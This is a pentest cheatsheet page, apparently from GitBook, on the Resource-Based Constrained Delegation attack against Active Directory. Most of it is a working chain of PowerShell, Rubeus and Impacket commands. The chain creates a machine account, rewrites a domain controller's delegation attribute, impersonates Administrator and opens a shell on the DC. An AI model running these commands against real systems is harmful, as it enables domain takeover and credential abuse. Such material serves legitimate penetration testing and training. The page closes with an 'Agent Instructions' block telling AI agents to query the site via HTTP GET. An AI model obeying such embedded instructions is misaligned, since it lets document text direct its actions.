# Resource Based Constrained Delegation If we have an account with permission `GenericAll`, we can create or update info of users like passwords, machines, etc. {% embed url="" %} Resource Based Constrained Delegation {% endembed %} ```powershell #Import Powermad and use it to create a new MACHINE ACCOUNT Import-Module .\Powermad.ps1 #Or . .\Powermad.ps1 # Create new machine New-MachineAccount -MachineAccount lanz -Password $(ConvertTo-SecureString 'buenosdias' -AsPlainText -Force) -Verbose #Import PowerView and get the SID of our new created machine account . .\PowerView.ps1 $ComputerSid = Get-DomainComputer lanz -Properties objectsid | Select -Expand objectsid #Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor: $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) #Next, we need to set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView # Out Target could be: dc.target.com Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose #After that we need to get the RC4 hash of the new machine account's password using Rubeus Rubeus.exe hash /password:'buenosdias' # Or with Python3 import hashlib print(hashlib.new('md4', 'buenosdias'.encode('utf-16le')).hexdigest()) #And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus Rubeus.exe s4u /user:lanz /rc4: /impersonateuser:Administrator /msdsspn:cifs/dc.example.com /domain:example.com /ptt ``` Take the hash, copy in your machine, decode base64 and use **ticketConverter.py** to generate the file `.ccache`, then export the ticket in the environment var `KRB5CCNAME=ticket.ccache` and use **wmiexec**, **psexec**, **smbexec**, etc. to authenticate, impersonate user and get a Shell. ```bash python3 ticketConverter.py ticket.kirbi ticket.ccache export KRB5CCNAME=ticket.ccache wmiexec.py Administrator@dc.example.com -k -no-pass smbexec.py Administrator@dc.example.com -k -no-pass psexec.py Administrator@dc.example.com -k -no-pass ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://lanzt.gitbook.io/cheatsheet-pentest/windows-things/active-directory-methodology/attacks/kerberos/resource-based-constrained-delegation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.